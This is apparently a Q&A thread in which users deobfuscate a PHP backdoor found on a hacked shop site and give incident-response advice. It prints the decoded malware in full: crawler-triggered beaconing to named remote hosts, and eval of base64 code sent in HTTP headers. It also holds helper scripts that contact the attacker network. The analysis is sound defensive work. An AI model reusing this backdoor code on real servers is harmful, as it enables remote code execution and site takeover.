  function w3net_getfile($I1ll11, $I11IIl) {
    $IIlI1I = "curl";
    $I1IIll = $IIlI1I."_init";
    if (@ini_get("allow_url_fopen") == "1") {
      return @file_get_contents("http://" . $I1ll11 . $I11IIl. "&w=fgc");
    } elseif (function_exists($I1IIll)){
      $QO00QO = @$I1IIll();
      $QOOOQQ = $IIlI1I."_setopt";
      $IIl11I = $IIlI1I."_exec";
      @$QOOOQQ($QO00QO, CURLOPT_URL, "http://" . $I1ll11 . $I11IIl. "&w=cu");
      @$QOOOQQ($QO00QO, CURLOPT_HEADER, false);
      @$QOOOQQ($QO00QO, CURLOPT_RETURNTRANSFER, true);
      @$QOOOQQ($QO00QO, CURLOPT_CONNECTTIMEOUT, 6);
      $IIIl1I = @$IIl11I($QO00QO);
      @curl_close($QO00QO);
      if (empty($IIIl1I)) {
        $IIIl1I = "";
      }
      return $IIIl1I;
    } else {
      $Q0OOOQ = @fsockopen($I1ll11, 80, $Il111l, $Q000O0, 5);
      if ($Q0OOOQ) {
        $I111lI = "";
        $I1lI1I = NULL;
        @fputs($Q0OOOQ, "GET {$I11IIl}"."&w=sk HTTP/1.0"."\r\n"."Host: "."{$I1ll11}\r\n");
        $QOOOQO = PHP_OS."/".PHP_VERSION;
        @fputs($Q0OOOQ, "User-Agent: {$QOOOQO}\r\n\r\n");
        while(!w3net_feof($Q0OOOQ, $I1lI1I) && (microtime(true) - $I1lI1I) < 2) {
          $I111lI .= @fgets($Q0OOOQ, 128);
        }
        @fclose($Q0OOOQ);
        $Q000OQ = explode("\r\n\r\n", $I111lI);
        unset($Q000OQ[0]);
        return implode("\r\n\r\n", $Q000OQ);
      }
    }
  }

  function w3net_output($I1I1lI, $I1lIll) {
    echo "Y_".$I1I1lI.":".$I1lIll."\r\n";
  }

  function php_server($Q0000Q){
    return @$_SERVER[$Q0000Q];
  }

  $IlI11l=I11lIl1I(55, 14);
  $I1lll1=I11lIl1I(69, 6);
  $Q0Q0QO=I11lIl1I(78, 23);
  $I1ll11=I11lIl1I(102, 10);
  if (isset($_SERVER[I11lIl1I(114, 7)])) {
    if (@$_SERVER[I11lIl1I(114, 7)] != I11lIl1I(122, 4)) { $I1ll11=I11lIl1I(130, 11); }
  }
  $I1ll11.=strtolower(@$_SERVER[I11lIl1I(142, 12)]);

  foreach ($_GET as $I1I1lI=>$I1lIll) {
    if (strpos($I1lIll,I11lIl1I(157, 7))) {
      $_GET[$I1I1lI]=I11lIl1I(167, 0);
    } elseif (strpos($I1lIll,I11lIl1I(167, 8))) {
      $_GET[$I1I1lI]=I11lIl1I(167, 0);
    }
  }

  if(!isset($_SERVER[I11lIl1I(175, 15)])) {
    $_SERVER[I11lIl1I(175, 15)] = @$_SERVER[I11lIl1I(190, 15)];
    if(isset($_SERVER[I11lIl1I(211, 16)])) {
      $_SERVER[I11lIl1I(175, 15)] .= I11lIl1I(231, 2) . @$_SERVER[I11lIl1I(211, 16)];
    }
  }

  function get_temp_directory() {
    $I11III=dirname(__FILE__).DIRECTORY_SEPARATOR;
    $Q0Q00Q = Array( "/dev/shm", "/tmp/.font-unix", "/tmp/.ICE-unix", @$_SERVER["TMP"], @$_SERVER["TEMP"], @$_ENV["TMP"], @$_ENV["TMPDIR"], @$_ENV["TEMP"], "/tmp", @ini_get("upload_tmp_dir"), $I11III."tmp", $I11III."wp-content/uploads", $I11III."wp-content/cache", );

    foreach ($Q0Q00Q as $Q0QOOO){ 
      if (!empty($Q0QOOO)){
        $Q0QOOO.=DIRECTORY_SEPARATOR;
        if (@is_writable($Q0QOOO)) {
          $I11III = $Q0QOOO; break;
        }
      }
    }

    return $I11III;
  }

  if (strlen($I1ll11) < 10) {
    define(I11lIl1I(235, 16), 0);

  } elseif ($Q0OO0O=$I1ll11.@$_SERVER[I11lIl1I(175, 15)]) {
    $QO0O0Q=@md5($I1ll11.PHP_OS.$I1lll1.$Q0Q0QO);
    $w3n_code=get_temp_directory().I11lIl1I(253, 2).$QO0O0Q;
    define(I11lIl1I(235, 16), $w3n_code);
    $IlIlII = $w3n_code.I11lIl1I(257, 6);
    if (@$_SERVER[I11lIl1I(267, 15)]==$QO0O0Q) {
      $QO0QQ0=I11lIl1I(282, 18);
      echo "\r\n";
      w3net_output(I11lIl1I(301, 8), $I1lll1.I11lIl1I(310, 2).$IlI11l.I11lIl1I(314, 6));
      if ($Q00OQO=$QO0QQ0(@$_SERVER[I11lIl1I(321, 16)])){
        @eval($Q00OQO);
        echo "\r\n";
        w3net_output(I11lIl1I(338, 4), I11lIl1I(342, 3));
      }
      exit(0);
    }
    $II11l1 = False;
    $Il11I1 = @strtolower(@$_SERVER[I11lIl1I(346, 20)]);
    foreach (explode(I11lIl1I(366, 2), I11lIl1I(371, 54)) as $QOOQOO) {
      if (strpos($Il11I1, $QOOQOO)!==False) {
        $Il1Il1 = @fopen($w3n_code.I11lIl1I(257, 6), I11lIl1I(430, 2));
        $Ill11I = @urlencode(@$_SERVER[I11lIl1I(175, 15)]);
        @fwrite($Il1Il1, time()."\t".$QOOQOO."\t".$Ill11I."\n");
        @fclose($Il1Il1);
        $II11l1=True;
        break;
      }
    }
    if (@is_file($w3n_code)) {
      @touch($w3n_code);
      @include_once($w3n_code);
    } elseif ($II11l1 === True) {
      $I1Il1I = Array(I11lIl1I(435, 12), I11lIl1I(449, 16));
      if (@touch($w3n_code)) {
        $Q0OO0O=@urlencode($Q0OO0O);
        $I11IIl = I11lIl1I(465, 14).$Q0OO0O.I11lIl1I(482, 4).$QO0O0Q.I11lIl1I(487, 12).$IlI11l.I11lIl1I(503, 4).$I1lll1;
        $QOQOQO = w3net_getfile($I1Il1I[0], $I11IIl);
        @touch($w3n_code);
      }
    }
  } else {
    define(I11lIl1I(235, 16), 1);
  }
}

As we can see, it obfuscates some strings and function names again using the I11lIl1I(..)-function. Let us replace these ones:

if (!defined("determinator")) {
  if (function_exists("ini_set")) { 
    @ini_set("allow_url_fopen", 1);
    @ini_set("display_errors", 0);
  }

  function w3net_feof($Q0OOOQ, &$I1lI1I = NULL) {
    $I1lI1I = microtime(true);
    return feof($Q0OOOQ);
  }

  function w3net_getfile($I1ll11, $I11IIl) {
    $IIlI1I = "curl";
    $I1IIll = $IIlI1I."_init";
    if (@ini_get("allow_url_fopen") == "1") {
      return @file_get_contents("http://" . $I1ll11 . $I11IIl. "&w=fgc");
    } elseif (function_exists($I1IIll)){
      $QO00QO = @$I1IIll();
      $QOOOQQ = $IIlI1I."_setopt";
      $IIl11I = $IIlI1I."_exec";
      @$QOOOQQ($QO00QO, CURLOPT_URL, "http://" . $I1ll11 . $I11IIl. "&w=cu");
      @$QOOOQQ($QO00QO, CURLOPT_HEADER, false);
      @$QOOOQQ($QO00QO, CURLOPT_RETURNTRANSFER, true);
      @$QOOOQQ($QO00QO, CURLOPT_CONNECTTIMEOUT, 6);
      $IIIl1I = @$IIl11I($QO00QO);
      @curl_close($QO00QO);
      if (empty($IIIl1I)) {
        $IIIl1I = "";
      }
      return $IIIl1I;
    } else {
      $Q0OOOQ = @fsockopen($I1ll11, 80, $Il111l, $Q000O0, 5);
      if ($Q0OOOQ) {
        $I111lI = "";
        $I1lI1I = NULL;
        @fputs($Q0OOOQ, "GET {$I11IIl}"."&w=sk HTTP/1.0"."\r\n"."Host: "."{$I1ll11}\r\n");
        $QOOOQO = PHP_OS."/".PHP_VERSION;
        @fputs($Q0OOOQ, "User-Agent: {$QOOOQO}\r\n\r\n");
        while(!w3net_feof($Q0OOOQ, $I1lI1I) && (microtime(true) - $I1lI1I) < 2) {
          $I111lI .= @fgets($Q0OOOQ, 128);
        }
        @fclose($Q0OOOQ);
        $Q000OQ = explode("\r\n\r\n", $I111lI);
        unset($Q000OQ[0]);
        return implode("\r\n\r\n", $Q000OQ);
      }
    }
  }

  function w3net_output($I1I1lI, $I1lIll) {
    echo "Y_".$I1I1lI.":".$I1lIll."\r\n";
  }

  function php_server($Q0000Q){
    return @$_SERVER[$Q0000Q];
  }

  $IlI11l="ftp/201309";
  $I1lll1="3.01";
  $Q0Q0QO="QQ0OQ000000Q0OQ0Q";
  $I1ll11="http://";
  if (isset($_SERVER["HTTPS"])) {
    if (@$_SERVER["HTTPS"] != "off") { $I1ll11="https://"; }
  }
  $I1ll11.=strtolower(@$_SERVER["HTTP_HOST"]);

  foreach ($_GET as $I1I1lI=>$I1lIll) {
    if (strpos($I1lIll,"union")) {
      $_GET[$I1I1lI]="";
    } elseif (strpos($I1lIll,"select")) {
      $_GET[$I1I1lI]="";
    }
  }

  if(!isset($_SERVER["REQUEST_URI"])) {
    $_SERVER["REQUEST_URI"] = @$_SERVER["SCRIPT_NAME"];
    if(isset($_SERVER["QUERY_STRING"])) {
      $_SERVER["REQUEST_URI"] .= "?" . @$_SERVER["QUERY_STRING"];
    }
  }

  function get_temp_directory() {
    $I11III=dirname(__FILE__).DIRECTORY_SEPARATOR;
    $Q0Q00Q = Array( "/dev/shm", "/tmp/.font-unix", "/tmp/.ICE-unix", @$_SERVER["TMP"], @$_SERVER["TEMP"], @$_ENV["TMP"], @$_ENV["TMPDIR"], @$_ENV["TEMP"], "/tmp", @ini_get("upload_tmp_dir"), $I11III."tmp", $I11III."wp-content/uploads", $I11III."wp-content/cache", );

    foreach ($Q0Q00Q as $Q0QOOO){ 
      if (!empty($Q0QOOO)){
        $Q0QOOO.=DIRECTORY_SEPARATOR;
        if (@is_writable($Q0QOOO)) {
          $I11III = $Q0QOOO; break;
        }
      }
    }

    return $I11III;
  }

  if (strlen($I1ll11) < 10) {
    define("determinator", 0);

  } elseif ($Q0OO0O=$I1ll11.@$_SERVER["REQUEST_URI"]) {
    $QO0O0Q=@md5($I1ll11.PHP_OS.$I1lll1.$Q0Q0QO);
    $w3n_code=get_temp_directory().".".$QO0O0Q;
    define("determinator", $w3n_code);
    $IlIlII = $w3n_code.".log";
    if (@$_SERVER["HTTP_Y_AUTH"]==$QO0O0Q) {
      $QO0QQ0="base64_decode";
      echo "\r\n";
      w3net_output("versio", $I1lll1."-".$IlI11l."-php");
      if ($Q00OQO=$QO0QQ0(@$_SERVER["HTTP_EXECPHP"])){
        @eval($Q00OQO);
        echo "\r\n";
        w3net_output("out", "ok");
      }
      exit(0);
    }
    $II11l1 = False;
    $Il11I1 = @strtolower(@$_SERVER["HTTP_USER_AGENT"]);
    foreach (explode(",", "google,yahoo,baidu,bingbot,msnbot,yandex") as $QOOQOO) {
      if (strpos($Il11I1, $QOOQOO)!==False) {
        $Il1Il1 = @fopen($w3n_code.".log", "a");
        $Ill11I = @urlencode(@$_SERVER["REQUEST_URI"]);
        @fwrite($Il1Il1, time()."\t".$QOOQOO."\t".$Ill11I."\n");
        @fclose($Il1Il1);
        $II11l1=True;
        break;
      }
    }
    if (@is_file($w3n_code)) {
      @touch($w3n_code);
      @include_once($w3n_code);
    } elseif ($II11l1 === True) {
      $I1Il1I = Array("sezqo.net", "fastaddz.com");
      if (@touch($w3n_code)) {
        $Q0OO0O=@urlencode($Q0OO0O);
        $I11IIl = "/w3.php?u=".$Q0OO0O."&k=".$QO0O0Q."&t=php&p=".$IlI11l."&v=".$I1lll1;
        $QOQOQO = w3net_getfile($I1Il1I[0], $I11IIl);
        @touch($w3n_code);
      }
    }
  } else {
    define("determinator", 1);
  }
}

Again some string used instead function names etc. I replaced those to make the code readable again. Result: script found in section "The Decoded and Cleaned Up Script".

Fetching the remote script

The following script implement the trojans protocol, but instead of executing the code it shall log it to a file. Better change the $hash (e.g. use http://www.md5.cz/ to generate a valid md5 hash) - value must be equal in both scripts!

Store both script in a location accessible from internet. Change $fn = "evilphpcode-".$N.txt"; to a path where a script may create files! Call the script from the browser, it should say "Hi there ;-)". Set $url of second script to this URL. It will send a fake request to the "network". Call it from the browser and see "OK, request sent!". Now the script will log incoming 'execution requests' to files. This might take a while... then let us know what was in there!

First script (logging):

<?php   
$hash = "c1a227ac6f77c4ad098144a61dd906a0";

$code = base64_decode(@$_SERVER["HTTP_EXECPHP"]);
$auth = $_SERVER["HTTP_Y_AUTH"];

function store() {
  global $code, $auth;
  for($N=1; file_exists($fn);++$N) { $fn = "evilphpcode-".$N.txt"; }
  file_put_contents($fn, $code);
  file_put_contents($fn."-hash", $auth);
}

if ($auth != $hash) { echo "Hi there ;-)"; store(); exit(0); }

$version1="ftp/201309"; $version2="3.01";
function out($key, $val) { echo "Y_".$key.":".$val."\r\n"; }
out("versio", $version2."-".$version1."-php");
sleep(1); store();
echo "\r\n";
out("out", "ok");

?>

Second script (request):

<?php
$hash = "c1a227ac6f77c4ad098144a61dd906a0";
$url = "http://mydomain.com/path/toscript/script.php"; // <-- put in first scripts location!!!

$url = urlencode($url);
$urltofetch = "http://sezqo.net/w3.php?u=".$url."&k=".$hash."&t=php&p=".$version1."&v=".$version2;
$data = file_get_contents($urltofetch);
echo "OK, request sent!";
?>

I added the section "Fetching the remote script". This gives you two scripts at hand, that you can use to retrieve evil code from the remote network (but without executing it). This will give us an idea what this network does and how bad your situation is... — SDwarfs, Nov 20 '13 at 17:46
stefan you are genius. i dont know what should i call you. but i lost all my traffic since i was hacked. i m also loosing my site ranking day by day. don't know what to do now — ujjawal, Nov 20 '13 at 18:15
I suggest you to make a full backup of your system (unmounted disk drive if possible) and to reinstall the whole system anew afterwards. (from scratch!). Don't use anything from the backup without having a close look at it first... What kind of system is this? Only "webspace" for PHP scripts or a root server? In case of "webspace" inform your provider about the issue! If its a managed or root server you'll need to reinstall it yourself. — SDwarfs, Nov 20 '13 at 18:44
Finding out the way the script got into your system is more complicated. You should try to do that -after- doing a backup and taking the old system off the net (or reinstalling it). Also try the code from the last section to fetch the php script from the remote server... this will give us information about what's happend to your server and what needs further be done. For example, the script might have transfered your user database (email addresses, passwords or their hashes, ...). If so, you'd need to take equivalent actions... — SDwarfs, Nov 20 '13 at 18:53
i could not get the php code and its keeps creating the log files after deleting every time in the path of the server. The log file has the entries — ujjawal, Nov 20 '13 at 19:07
Ok, in that case the code was installed in scripts that are handling the following of your URIs: /categories/sarees/exclusive-sarees/ --- /categories/men-zone/salwar-kurta/ --- /categories/ready-to-ship/express-salwar-suits/ --- /categories/Sarees/ /products/ibd111613-beige-and-teal-bhagalpuri-silk-printe‌d-saree.html ; You should check theses scripts! These script might have a security hole that allows to inject this code into the scripts... — SDwarfs, Nov 20 '13 at 19:35
Seems to be a shop system. You should check this shop system. Get the newest version of it ... if its provided by some firm, ask their support for help. — SDwarfs, Nov 20 '13 at 19:39
Ok, the request URL just said "404 Not Found", but actually received the request. So I got a part of the script `eval(base64_decode($_POST["Y_CODE"]));`. But I did not log the POST variables, in which the real script was embedded (as we can see from this short snippet). I started another try, and will now log the GET/POST variables too. — SDwarfs, Nov 20 '13 at 20:07
Ok, I made some progress. The script sent from the remote server sends 3 POST variables: a) $_POST["Y_CODE"] contains simple code that base64_decodes variable $_POST["Y_FILE"] and writes it to the file named $hash (which is executed with your webpage later on, as already explained). It also outputs the "size" of the code via w3net_out. This seems to be a check, if the code has really been executed. c) $_POST["Y_SALT"] contains some short string (random value?); It seems that $_POST["Y_FILE"] is empty in the first call, which checks if the output "Y_len: 0"is returned and aborts if not. — SDwarfs, Nov 20 '13 at 21:26
unfortunately vendor has stopped providing support and now releasing further versions. I have to make it from scratch or try some other shopping cart. — ujjawal, Nov 21 '13 at 05:35
Ok, with some luck your data is not compromised. I had the script now running over night. It gets "pinged" with empty Y_CODE multiple times, checking if the script is still reachable, but does nothing else. Maybe this is a network for doing DDoS-Attacks (waiting for the command to start an attack) or it just waits until someone "buys" the access to the system... Anyway, you must find out and close the security hole that was used to inject the script into your site... — SDwarfs, Nov 21 '13 at 09:13

score 1 · Answer 2 · answered Nov 20 '13 at 12:09

Starts like this:

$II11 = 110426;
if (!function_exists('I11lIl1I')) {
    $GLOBALS['II11'] =   'PAYLOAD';

    function I11lIl1I($a, $b) {
        $c = $GLOBALS['II11'];
        $d = pack('H*', '6261736536345f6465636f' . '6465');
        return $d(substr($c, $a, $b));
    };
    $QO0000QQ0 = I11lIl1I(3374, 16);
    $QO0000QQ0("/Q0QO00QOO/e", I11lIl1I(507, 2862), "Q0QO00QOO");
};

Witch turns into this:

if (!defined("determinator")) {
    if (function_exists(I11lIl1I(1, 10))) {
        @ini_set(I11lIl1I(14, 20), 1);
        @ini_set(I11lIl1I(34, 19), 0);
    }

    function w3net_feof($Q0OOOQ, &$I1lI1I = NULL) {
        $I1lI1I = microtime(true);
        return feof($Q0OOOQ);
    }

    function w3net_getfile($I1ll11, $I11IIl) {
        $IIlI1I = "curl";
        $I1IIll = $IIlI1I . "_init";
        if (@ini_get("allow_url_fopen") == "1") {
            return @file_get_contents("http://" . $I1ll11 . $I11IIl . "&w=fgc");
        } elseif (function_exists($I1IIll)) {
            $QO00QO = @$I1IIll();
            $QOOOQQ = $IIlI1I . "_setopt";
            $IIl11I = $IIlI1I . "_exec";
            @$QOOOQQ($QO00QO, CURLOPT_URL, "http://" . $I1ll11 . $I11IIl . "&w=cu");
            @$QOOOQQ($QO00QO, CURLOPT_HEADER, false);
            @$QOOOQQ($QO00QO, CURLOPT_RETURNTRANSFER, true);
            @$QOOOQQ($QO00QO, CURLOPT_CONNECTTIMEOUT, 6);
            $IIIl1I = @$IIl11I($QO00QO);
            @curl_close($QO00QO);
            if (empty($IIIl1I)) {
                $IIIl1I = "";
            } return $IIIl1I;
        } else {
            $Q0OOOQ = @fsockopen($I1ll11, 80, $Il111l, $Q000O0, 5);
            if ($Q0OOOQ) {
                $I111lI = "";
                $I1lI1I = NULL;
                @fputs($Q0OOOQ, "GET {$I11IIl}" . "&w=sk HTTP/1.0" . "\r\n" . "Host: " . "{$I1ll11}\r\n");
                $QOOOQO = PHP_OS . "/" . PHP_VERSION;
                @fputs($Q0OOOQ, "User-Agent: {$QOOOQO}\r\n\r\n");
                while (!w3net_feof($Q0OOOQ, $I1lI1I) && (microtime(true) - $I1lI1I) < 2) {
                    $I111lI .= @fgets($Q0OOOQ, 128);
                } @fclose($Q0OOOQ);
                $Q000OQ = explode("\r\n\r\n", $I111lI);
                unset($Q000OQ[0]);
                return implode("\r\n\r\n", $Q000OQ);
            }
        }
    }

    function w3net_output($I1I1lI, $I1lIll) {
        echo "Y_" . $I1I1lI . ":" . $I1lIll . "\r\n";
    }

    function php_server($Q0000Q) {
        return @$_SERVER[$Q0000Q];
    }

$IlI11l = I11lIl1I(55, 14);
    $I1lll1 = I11lIl1I(69, 6);
    $Q0Q0QO = I11lIl1I(78, 23);
    $I1ll11 = I11lIl1I(102, 10);
    if (isset($_SERVER[I11lIl1I(114, 7)])) {
        if (@$_SERVER[I11lIl1I(114, 7)] != I11lIl1I(122, 4)) {
            $I1ll11 = I11lIl1I(130, 11);
        }
    } $I1ll11.=strtolower(@$_SERVER[I11lIl1I(142, 12)]);
    foreach ($_GET as $I1I1lI => $I1lIll) {
        if (strpos($I1lIll, I11lIl1I(157, 7))) {
            $_GET[$I1I1lI] = I11lIl1I(167, 0);
        } elseif (strpos($I1lIll, I11lIl1I(167, 8))) {
            $_GET[$I1I1lI] = I11lIl1I(167, 0);
        }
    } if (!isset($_SERVER[I11lIl1I(175, 15)])) {
        $_SERVER[I11lIl1I(175, 15)] = @$_SERVER[I11lIl1I(190, 15)];
        if (isset($_SERVER[I11lIl1I(211, 16)])) {
            $_SERVER[I11lIl1I(175, 15)] .= I11lIl1I(231, 2) . @$_SERVER[I11lIl1I(211, 16)];
        }
    }

    function get_temp_directory() {
        $I11III = dirname(__FILE__) . DIRECTORY_SEPARATOR;
        $Q0Q00Q = Array("/dev/shm", "/tmp/.font-unix", "/tmp/.ICE-unix", @$_SERVER["TMP"], @$_SERVER["TEMP"], @$_ENV["TMP"], @$_ENV["TMPDIR"], @$_ENV["TEMP"], "/tmp", @ini_get("upload_tmp_dir"), $I11III . "tmp", $I11III . "wp-content/uploads", $I11III . "wp-content/cache",);
        foreach ($Q0Q00Q as $Q0QOOO) {
            if (!empty($Q0QOOO)) {
                $Q0QOOO.=DIRECTORY_SEPARATOR;
                if (@is_writable($Q0QOOO)) {
                    $I11III = $Q0QOOO;
                    break;
                }
            }
        } return $I11III;
    }

if (strlen($I1ll11) < 10) {
        define(I11lIl1I(235, 16), 0);
    } elseif ($Q0OO0O = $I1ll11 . @$_SERVER[I11lIl1I(175, 15)]) {
        $QO0O0Q = @md5($I1ll11 . PHP_OS . $I1lll1 . $Q0Q0QO);
        $w3n_code = get_temp_directory() . I11lIl1I(253, 2) . $QO0O0Q;
        define(I11lIl1I(235, 16), $w3n_code);
        $IlIlII = $w3n_code . I11lIl1I(257, 6);
        if (@$_SERVER[I11lIl1I(267, 15)] == $QO0O0Q) {
            $QO0QQ0 = I11lIl1I(282, 18);
            echo "\r\n";
            w3net_output(I11lIl1I(301, 8), $I1lll1 . I11lIl1I(310, 2) . $IlI11l . I11lIl1I(314, 6));
            if ($Q00OQO = $QO0QQ0(@$_SERVER[I11lIl1I(321, 16)])) {
                @eval($Q00OQO);
                echo "\r\n";
                w3net_output(I11lIl1I(338, 4), I11lIl1I(342, 3));
            } exit(0);
        } $II11l1 = False;
        $Il11I1 = @strtolower(@$_SERVER[I11lIl1I(346, 20)]);
        foreach (explode(I11lIl1I(366, 2), I11lIl1I(371, 54)) as $QOOQOO) {
            if (strpos($Il11I1, $QOOQOO) !== False) {
                $Il1Il1 = @fopen($w3n_code . I11lIl1I(257, 6), I11lIl1I(430, 2));
                $Ill11I = @urlencode(@$_SERVER[I11lIl1I(175, 15)]);
                @fwrite($Il1Il1, time() . "\t" . $QOOQOO . "\t" . $Ill11I . "\n");
                @fclose($Il1Il1);
                $II11l1 = True;
                break;
            }
        } if (@is_file($w3n_code)) {
            @touch($w3n_code);
            @include_once($w3n_code);
        } elseif ($II11l1 === True) {
            $I1Il1I = Array(I11lIl1I(435, 12), I11lIl1I(449, 16));
            if (@touch($w3n_code)) {
                $Q0OO0O = @urlencode($Q0OO0O);
                $I11IIl = I11lIl1I(465, 14) . $Q0OO0O . I11lIl1I(482, 4) . $QO0O0Q . I11lIl1I(487, 12) . $IlI11l . I11lIl1I(503, 4) . $I1lll1;
                $QOQOQO = w3net_getfile($I1Il1I[0], $I11IIl);
                @touch($w3n_code);
            }
        }
    } else {
        define(I11lIl1I(235, 16), 1);
    }
}

After that who knows. Happy hunting

I got to the same point, but was too lazy to move on. It most likely injects some remotely downloaded code into all writable files it can find. — Vlad Preda, Nov 20 '13 at 12:10
No, it does not do that. It just announces to a network server (as soon the script is executed by request from a search engine crawler) with some authentication hash (and the URL of the script location + some parameters) and waits for being called back by the network (with this hash as authentication). This call will then contain PHP code which will be executed by the script. The PHP-script will be sent via HTTP-headers which are not found in http server log files. => For more information see my answer... — SDwarfs, Nov 20 '13 at 16:02